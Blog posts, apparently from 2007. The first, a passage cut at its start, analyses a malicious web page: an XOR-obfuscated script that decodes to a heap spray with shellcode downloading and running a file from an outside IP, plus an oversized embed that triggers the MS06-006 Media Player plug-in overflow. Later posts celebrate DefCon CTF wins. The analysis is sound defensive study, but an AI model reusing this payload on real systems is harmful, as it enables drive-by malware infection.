2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>

Which gets decoded as:


<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>


In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".

The final part of the decoded page might look familiar....if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.

Thursday, August 09, 2007

the H@cker Elite: UF engineers compete in Vegas

Folks around work get really stoked about our team winning which is cool. It's nice to be in the limelight but I find the need to keep reminding people that it wasn't just psifertex or myself that won CTF. It was a team effort and we couldn't have done it without having the right make up of people, personalities and technical skills.

I think that April Dudash from the Alligator did a wonderful job (article) capturing that sentiment. Thank you, April.

And, thank you, team 1@stplace and @tlas. Every one of you is incredible and I'm thankful to walk amongst you.

Sunday, August 05, 2007

1@stplace wins DefCon CTF 2 yrs in a row

After 24 hrs of competition over 3 days in Vegas, team 1@stplace took first place in the DefCon Capture the Flag contest hosted by Kenshoto. Headed up by team captain @tlas and co-captain Doc Brown (aka drb), we sifted our way through the maze of brilliant confusion weaved together by the Kenshoto guys. They are truly an amazing bunch of dedicated hackers who design the CTF challenges to take their fellow and aspiring hackers to the next level.

I am blessed to have been able to compete again with the talented 1@stplace team composed of @tlas, Doc Brown, fury, jrod, plato, psifertex, shiruken, wrffr and myself (mezzendo). @tlas provided great leadership throughout the time leading up to CTF and during the entire weekend. Teamwork, friendship and communication were key to our win.

Thank you @tlas for believing in me and picking me to be a part of this awesome experience two years in a row.